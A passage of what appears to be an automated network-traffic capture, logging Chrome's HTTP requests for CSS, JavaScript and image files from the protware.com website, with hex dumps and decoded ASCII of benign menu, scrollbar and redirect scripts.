              Data Ascii:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.44975668.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:34.307331085 CET338OUTGET /style_M.css HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: text/css,*/*;q=0.1
              Referer: http://www.protware.com/menu.htm
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:35.523658991 CET1236INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:35 GMT
              Content-Type: text/css
              Content-Length: 2134
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 64 69 76 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 34 70 78 3b 20 74 6f 70 3a 34 70 78 3b 20 77 69 64 74 68 3a 32 30 25 3b 20 68 65 69 67 68 74 3a 38 39 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 31 3b 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 0a 7d 0a 0a 41 3a 6c 69 6e 6b 20 7b 0a 09 43 4f 4c 4f 52 3a 20 23 46 46 46 46 46 46 3b 20 46 4f 4e 54 2d 57 45 49 47 48 54 3a 20 62 6f 6c 64 3b 20 54 45 58 54 2d 44 45 43 4f 52 41 54 49 4f 4e 3a 20 6e 6f 6e 65 0a 7d 0a 41 3a 76 69 73 69 74 65 64 20 7b 0a 09 43 4f 4c 4f 52 3a 20 23 46 46 46 46 46 46 3b 20 46 4f 4e 54 2d 57 45 49 47 48 54 3a 20 62 6f 6c 64 3b 20 54 45 58 54 2d 44 45 43 4f 52 41 54 49 4f 4e 3a 20 6e 6f 6e 65 0a 7d 0a 41 3a 61 63 74 69 76 65 20 7b 0a 09 42 41 43 4b 47 52 4f 55 4e 44 3a 20 23 46 46 46 [TRUNCATED]
              Data Ascii: div{position:absolute; left:4px; top:4px; width:20%; height:89px; z-index:1; visibility: hidden; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px}A:link {COLOR: #FFFFFF; FONT-WEIGHT: bold; TEXT-DECORATION: none}A:visited {COLOR: #FFFFFF; FONT-WEIGHT: bold; TEXT-DECORATION: none}A:active {BACKGROUND: #FFFFFF; FONT-WEIGHT: bold; color: #000000}A:hover {FONT-WEIGHT: bold; TEXT-DECORATION: none; background-color: #FFFFFF !important; color: #FF0000 !important}.tborder6 { BORDER-BOTTOM: #6666cc 0px solid; BORDER-LEFT: #6666cc 0px solid; BORDER-RIGHT: #6666cc 0px solid; BORDER-TOP: #6666cc 0.1em solid; PADDING-TOP: 2px; background-color: #009900; color: #FFFFFF; padding-right: 1px; padding-bottom: 5px; padding-left: 1px; font-style: normal; font-weight: bold; font-variant: normal; text-transform: none; margin-right: 2px; margin-left: 2px; background-position: 5px 5px; text-decoration: none; font-family: Verdana, Arial, Helvetica, sans-serif; font-size:
              Nov 30, 2024 00:40:35.523853064 CET1130INData Raw: 31 32 70 78 3b 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 7d 0a 0a 2e 68 74 6d 6c 67 20 7b 20 42 4f 52 44 45 52 2d 42 4f 54 54 4f 4d 3a 20 23 36 36 36 36 63 63 20 30 70 78 20 73 6f 6c 69 64 3b 20 42 4f 52 44 45 52 2d 4c 45 46 54
              Data Ascii: 12px; border-style: solid}.htmlg { BORDER-BOTTOM: #6666cc 0px solid; BORDER-LEFT: #6666cc 0px solid; BORDER-RIGHT: #6666cc 0px solid; BORDER-TOP: #6666cc 0.1em solid; PADDING-TOP: 2px; background-color: #FFFFFF; color: #009900; padding-right
              Nov 30, 2024 00:41:20.534349918 CET6OUTData Raw: 00
              Data Ascii:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.44975768.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:34.307648897 CET321OUTGET /scroll.js HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Referer: http://www.protware.com/home.htm
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:35.518946886 CET599INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:35 GMT
              Content-Type: text/javascript
              Content-Length: 361
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 62 61 72 41 72 72 6f 77 43 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 62 61 72 46 61 63 65 43 6f 6c 6f 72 3d 22 23 30 30 39 39 30 30 22 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 62 61 72 54 72 61 63 6b 43 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3b 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 73 65 74 6f 64 6c 28 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 64 6c 27 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 27 6e 6f 6e 65 27 7d 7d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 75 6e 73 65 74 6f 64 6c 28 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 64 6c 27 29 2e 73 74 79 6c [TRUNCATED]
              Data Ascii: document.body.style.scrollbarArrowColor="white";document.body.style.scrollbarFaceColor="#009900";document.body.style.scrollbarTrackColor="white";function setodl(){if(document.getElementById){document.getElementById('odl').style.display='none'}};function unsetodl(){if(document.getElementById){document.getElementById('odl').style.display='inline'}};
              Nov 30, 2024 00:41:20.534338951 CET6OUTData Raw: 00
              Data Ascii:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.44975868.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:34.308059931 CET320OUTGET /tpmnu.js HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Referer: http://www.protware.com/menu.htm
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:35.568043947 CET1236INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:35 GMT
              Content-Type: text/javascript
              Content-Length: 1723
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 42 72 77 73 72 20 3d 20 22 49 45 22 7d 3b 0d 0a 69 66 28 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 29 7b 42 72 77 73 72 20 3d 20 22 4e 4e 34 22 7d 3b 0d 0a 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 20 26 26 20 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 29 7b 42 72 77 73 72 20 3d 20 22 4e 4e 36 22 7d 3b 0d 0a 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 61 70 70 4e 61 6d 65 20 3d 3d 22 4f 70 65 72 61 22 29 7b 42 72 77 73 72 20 3d 20 22 4f 70 65 72 61 22 7d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 6e 6f 45 72 72 4d 73 67 28 29 7b 72 65 74 75 72 6e 20 74 72 75 65 7d 3b 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 20 3d 20 6e 6f 45 72 72 4d 73 67 3b 0d 0a 74 68 65 66 69 6c 65 3d 22 22 3b 74 68 65 6f 6c 64 66 69 6c 65 3d 22 22 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 6d 66 28 29 7b 0d 0a 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 29 7b 0d 0a 6c 6f 63 3d 70 61 72 65 6e 74 2e 66 72 61 6d [TRUNCATED]
              Data Ascii: if(document.all){Brwsr = "IE"};if(document.layers){Brwsr = "NN4"};if(document.getElementById && window.sidebar){Brwsr = "NN6"};if(navigator.appName =="Opera"){Brwsr = "Opera"};function noErrMsg(){return true};window.onerror = noErrMsg;thefile="";theoldfile="";function checkmf(){if(document.getElementById){loc=parent.frames.main.location.href; aloc=loc.lastIndexOf('/');filenam1=loc.substring(aloc+1);thefilearr = filenam1.split(".");thefile=thefilearr[0];if(thefile !== theoldfile){changemenu(thefile,theoldfile)}theoldfile = thefilesetTimeout('checkmf()',500)}}function changemenu(thefile,theoldfile){if(document.getElementById(thefile)!=null){document.getElementById(thefile).style.color = "black"document.getElementById(thefile).style.backgroundColor = "white"}if(theoldfile.length>1 && document.getElementById(theoldfile)!=null){document.getElementById(theoldfile).style.color = "white"document.getElementById(theoldfile).style.backgroun
              Nov 30, 2024 00:40:35.568136930 CET726INData Raw: 64 43 6f 6c 6f 72 20 3d 20 22 23 30 30 39 39 30 30 22 20 0d 0a 7d 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 73 68 6f 77 6e 66 6f 28 6c 69 6e 6b 49 44 2c 61 63 74 29 7b 0d 0a 74 68 65 4c 61 79 65 72 20 3d 20 22 4c 61 79 65 72 22 20 2b 20 6c
              Data Ascii: dColor = "#009900" }}function shownfo(linkID,act){theLayer = "Layer" + linkIDif(Brwsr=="IE"){if (act == "over"){eval('document.all.' + theLayer + '.style.visibility = "visible"')}if (act == "out"){eval('document.all.' + t
              Nov 30, 2024 00:40:35.794753075 CET381OUTGET /encrypt_html.ico HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
              Referer: http://www.protware.com/
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:36.165108919 CET1001INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:35 GMT
              Content-Type: image/x-icon
              Content-Length: 766
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 00 00 01 00 01 00 20 20 10 00 00 00 00 00 e8 02 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0 c0 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00 00 00 ff 00 ff 00 ff ff 00 00 ff ff ff 00 00 00 00 00 77 77 77 77 77 77 77 77 77 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 77 00 00 00 00 00 33 bb ff bb bb bb bb bb 33 07 77 70 00 00 00 00 3b bb ff bb bb bb bb b3 b3 30 77 70 00 00 00 00 33 bb ff bb bb bb bb bb 33 33 07 70 00 00 00 00 3b bb ff 0b bb 0b bb b3 b3 33 07 70 00 00 00 00 33 bb f0 0b bb 00 bb bb 33 33 07 70 00 00 00 00 3b bb 00 bb bb b0 0b b3 b3 33 07 70 00 00 00 00 33 b0 0f bb bb bb 00 bb 33 33 07 70 00 00 00 00 3b b0 ff bb bb bb b0 b3 b3 33 07 70 00 00 00 00 33 b0 ff bb bb bb b0 bb 33 33 07 70 00 00 00 00 3b b0 0f bb bb bb 00 b3 b3 33 07 70 00 00 00 00 33 bb 00 bb bb b0 0b bb 33 33 07 70 00 00 00 00 3b [TRUNCATED]
              Data Ascii: ( @wwwwwwwwwpww33wp;0wp333p;3p333p;3p333p;3p333p;3p333p;3p333p;3p3p3033330?333333pppppppwpwwwp0wwp;333;ppp??
              Nov 30, 2024 00:41:21.174869061 CET6OUTData Raw: 00
              Data Ascii:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.44975968.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:34.686374903 CET275OUTGET /frm.js HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:35.892257929 CET1061INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:35 GMT
              Content-Type: text/javascript
              Content-Length: 823
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 69 66 20 28 28 70 61 72 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 3d 20 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 20 26 26 20 77 69 6e 64 6f 77 2e 6e 61 6d 65 21 3d 27 71 61 7a 78 73 77 65 64 63 27 29 7b 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 64 65 66 61 75 6c 74 2e 68 74 6d 27 29 7d 3b 76 61 72 20 6e 38 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 72 70 6c 63 28 69 6e 70 66 2c 66 65 29 7b 0d 0a 09 66 65 41 3d 41 72 72 61 79 28 27 68 74 6d 27 2c 27 68 74 6d 6c 27 2c 27 61 73 70 27 2c 27 70 68 70 27 2c 27 73 68 74 6d 6c 27 29 3b 0d 0a 09 6e 75 3d 69 6e 70 66 2b 27 2e 27 2b 66 65 41 5b 66 65 5d 3b 0d 0a 09 64 4f 62 6a 3d 27 6c 6f 63 61 74 69 6f 6e 27 3b 20 64 56 61 6c 3d 27 27 3b 20 64 41 63 74 3d 27 2e 72 65 70 6c 61 63 65 28 22 27 3b 20 64 43 6c 3d 27 22 29 27 3b 20 64 48 65 78 3d 27 30 78 42 42 27 3b 0d 0a 09 65 76 61 6c 28 64 4f 62 6a 2b 64 41 63 74 2b 64 56 61 6c 2b 6e 75 2b 64 43 6c 29 3b 09 09 09 09 09 09 09 09 09 09 20 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e [TRUNCATED]
              Data Ascii: if ((parent.location.href == self.location.href) && window.name!='qazxswedc'){location.replace('default.htm')};var n8;function rplc(inpf,fe){feA=Array('htm','html','asp','php','shtml');nu=inpf+'.'+feA[fe];dObj='location'; dVal=''; dAct='.replace("'; dCl='")'; dHex='0xBB';eval(dObj+dAct+dVal+nu+dCl); }function rwl(inp){if(document.getElementById){nulk= Array('k-data::3','source_browser::9','security-set_6::2','v_debug_a::0','directory_7::2','corp_mngr_7::1','compare_encrypt_7::1','corp_data::0','security_audit_6::3','compare_ipr::4');feM=Array('htm','html','asp','php','shtml');c=n8?'obj=':'href=';for(i=0;i<inp.length;i++){a=nulk[inp[i]].slice(0,nulk[inp[i]].indexOf('::'));b=nulk[inp[i]].slice(nulk[inp[i]].indexOf('::')+2);eval("document.getElementById(inp[i])"+"."+c+"a+'.'+feM[b]");}}}
              Nov 30, 2024 00:40:35.959996939 CET278OUTGET /scroll.js HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:36.321105003 CET599INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:36 GMT
              Content-Type: text/javascript
              Content-Length: 361
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 62 61 72 41 72 72 6f 77 43 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 62 61 72 46 61 63 65 43 6f 6c 6f 72 3d 22 23 30 30 39 39 30 30 22 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 62 61 72 54 72 61 63 6b 43 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3b 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 73 65 74 6f 64 6c 28 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 64 6c 27 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 27 6e 6f 6e 65 27 7d 7d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 75 6e 73 65 74 6f 64 6c 28 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 64 6c 27 29 2e 73 74 79 6c [TRUNCATED]
              Data Ascii: document.body.style.scrollbarArrowColor="white";document.body.style.scrollbarFaceColor="#009900";document.body.style.scrollbarTrackColor="white";function setodl(){if(document.getElementById){document.getElementById('odl').style.display='none'}};function unsetodl(){if(document.getElementById){document.getElementById('odl').style.display='inline'}};
              Nov 30, 2024 00:41:21.331101894 CET6OUTData Raw: 00
              Data Ascii:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.44976068.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:34.692394018 CET276OUTGET /stat.js HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:35.852425098 CET424INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:35 GMT
              Content-Type: text/javascript
              Content-Length: 186
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 66 75 6e 63 74 69 6f 6e 20 6e 73 39 28 29 7b 77 69 6e 64 6f 77 2e 73 74 61 74 75 73 20 3d 20 22 50 72 6f 74 57 61 72 65 27 73 20 48 54 4d 4c 20 47 75 61 72 64 69 61 6e 20 2d 20 74 68 65 20 77 6f 72 6c 64 27 73 20 73 74 61 6e 64 61 72 64 20 66 6f 72 20 77 65 62 73 69 74 65 20 70 72 6f 74 65 63 74 69 6f 6e 20 2d 20 45 6e 63 72 79 70 74 20 48 54 4d 4c 2c 20 41 53 50 2c 20 4a 61 76 61 73 63 72 69 70 74 2c 20 56 42 73 63 72 69 70 74 20 73 6f 75 72 63 65 2e 22 3b 73 65 74 54 69 6d 65 6f 75 74 28 22 6e 73 39 28 29 22 2c 32 30 30 29 3b 7d 3b 6e 73 39 28 29 3b
              Data Ascii: function ns9(){window.status = "ProtWare's HTML Guardian - the world's standard for website protection - Encrypt HTML, ASP, Javascript, VBscript source.";setTimeout("ns9()",200);};ns9();
              Nov 30, 2024 00:40:35.962610006 CET277OUTGET /tpmnu.js HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:36.314851046 CET1236INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:36 GMT
              Content-Type: text/javascript
              Content-Length: 1723
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Data Raw: 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 42 72 77 73 72 20 3d 20 22 49 45 22 7d 3b 0d 0a 69 66 28 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 29 7b 42 72 77 73 72 20 3d 20 22 4e 4e 34 22 7d 3b 0d 0a 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 20 26 26 20 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 29 7b 42 72 77 73 72 20 3d 20 22 4e 4e 36 22 7d 3b 0d 0a 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 61 70 70 4e 61 6d 65 20 3d 3d 22 4f 70 65 72 61 22 29 7b 42 72 77 73 72 20 3d 20 22 4f 70 65 72 61 22 7d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 6e 6f 45 72 72 4d 73 67 28 29 7b 72 65 74 75 72 6e 20 74 72 75 65 7d 3b 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 20 3d 20 6e 6f 45 72 72 4d 73 67 3b 0d 0a 74 68 65 66 69 6c 65 3d 22 22 3b 74 68 65 6f 6c 64 66 69 6c 65 3d 22 22 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 6d 66 28 29 7b 0d 0a 69 66 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 29 7b 0d 0a 6c 6f 63 3d 70 61 72 65 6e 74 2e 66 72 61 6d [TRUNCATED]
              Data Ascii: if(document.all){Brwsr = "IE"};if(document.layers){Brwsr = "NN4"};if(document.getElementById && window.sidebar){Brwsr = "NN6"};if(navigator.appName =="Opera"){Brwsr = "Opera"};function noErrMsg(){return true};window.onerror = noErrMsg;thefile="";theoldfile="";function checkmf(){if(document.getElementById){loc=parent.frames.main.location.href; aloc=loc.lastIndexOf('/');filenam1=loc.substring(aloc+1);thefilearr = filenam1.split(".");thefile=thefilearr[0];if(thefile !== theoldfile){changemenu(thefile,theoldfile)}theoldfile = thefilesetTimeout('checkmf()',500)}}function changemenu(thefile,theoldfile){if(document.getElementById(thefile)!=null){document.getElementById(thefile).style.color = "black"document.getElementById(thefile).style.backgroundColor = "white"}if(theoldfile.length>1 && document.getElementById(theoldfile)!=null){document.getElementById(theoldfile).style.color = "white"document.getElementById(theoldfile).style.backgroun
              Nov 30, 2024 00:40:36.315030098 CET726INData Raw: 64 43 6f 6c 6f 72 20 3d 20 22 23 30 30 39 39 30 30 22 20 0d 0a 7d 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 73 68 6f 77 6e 66 6f 28 6c 69 6e 6b 49 44 2c 61 63 74 29 7b 0d 0a 74 68 65 4c 61 79 65 72 20 3d 20 22 4c 61 79 65 72 22 20 2b 20 6c
              Data Ascii: dColor = "#009900" }}function shownfo(linkID,act){theLayer = "Layer" + linkIDif(Brwsr=="IE"){if (act == "over"){eval('document.all.' + theLayer + '.style.visibility = "visible"')}if (act == "out"){eval('document.all.' + t
              Nov 30, 2024 00:41:21.315504074 CET6OUTData Raw: 00
              Data Ascii:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.44976168.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:35.065464973 CET277OUTGET /prev.gif HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:36.315045118 CET982INHTTP/1.1 200 OK
              Server: nginx
              Date: Fri, 29 Nov 2024 23:40:36 GMT
              Content-Type: image/gif
              Content-Length: 773
              Connection: keep-alive
              Last-Modified: Sun, 11 Jun 2006 19:48:05 GMT
              Accept-Ranges: bytes
              Data Raw: 47 49 46 38 39 61 1e 00 1e 00 e6 ff 00 14 13 13 72 6d 6d 4a 47 47 c0 c0 c0 29 28 28 c0 be be ff ff ff f5 f5 f5 eb eb eb e8 e8 e8 df df df de de de dd dd dd db db db da da da d2 d2 d2 cf cf cf cd cd cd cb cb cb ca ca ca c5 c5 c5 c4 c4 c4 c1 c1 c1 be be be bc bc bc b9 b9 b9 b8 b8 b8 b7 b7 b7 b5 b5 b5 b3 b3 b3 b1 b1 b1 af af af ae ae ae ad ad ad a9 a9 a9 a7 a7 a7 9f 9f 9f 9b 9b 9b 9a 9a 9a 96 96 96 8e 8e 8e 8d 8d 8d 8c 8c 8c 8a 8a 8a 87 87 87 86 86 86 80 80 80 7c 7c 7c 7b 7b 7b 78 78 78 77 77 77 74 74 74 71 71 71 70 70 70 6f 6f 6f 6e 6e 6e 6d 6d 6d 6a 6a 6a 68 68 68 66 66 66 65 65 65 64 64 64 63 63 63 62 62 62 61 61 61 60 60 60 5e 5e 5e 5d 5d 5d 5b 5b 5b 5a 5a 5a 59 59 59 58 58 58 56 56 56 54 54 54 53 53 53 52 52 52 51 51 51 4d 4d 4d 4c 4c 4c 4b 4b 4b 4a 4a 4a 49 49 49 48 48 48 47 47 47 46 46 46 42 42 42 3e 3e 3e 3d 3d 3d 3c 3c 3c 3a 3a 3a 38 38 38 37 37 37 34 34 34 32 32 32 30 30 30 2f 2f 2f 2e 2e 2e 2a 2a 2a 29 29 29 28 28 28 22 22 22 21 21 21 20 20 20 1e 1e 1e 1d 1d 1d 1b 1b 1b 19 19 19 18 18 18 17 [TRUNCATED]
              Data Ascii: GIF89armmJGG)((|||{{{xxxwwwtttqqqpppooonnnmmmjjjhhhfffeeedddcccbbbaaa```^^^]]][[[ZZZYYYXXXVVVTTTSSSRRRQQQMMMLLLKKKJJJIIIHHHGGGFFFBBB>>>===<<<:::888777444222000///...***)))((("""!!! !,@:>*!/$8svHbsttuk3cDuuD43)'(1FZhor[db`\MH-;9LRXakoqvl04$&7Ufosu52YKt@ABFcWI,S[$0EEj,(_7$l<v(,`@^q.i-,c8l3B:4H!c1$%(DA"tbH!(H|ILQiFMUfP8qD8YxvJ)J-T#!$-[e:nD8@;
              Nov 30, 2024 00:41:21.315500021 CET6OUTData Raw: 00
              Data Ascii:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.44976268.233.44.128803168C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Nov 30, 2024 00:40:35.078798056 CET277OUTGET /new3.jpg HTTP/1.1
              Host: www.protware.com
              Connection: keep-alive
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: */*
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Nov 30, 2024 00:40:36.282979012 CET981INHTTP/1.1 200 OK
              Server: nginx
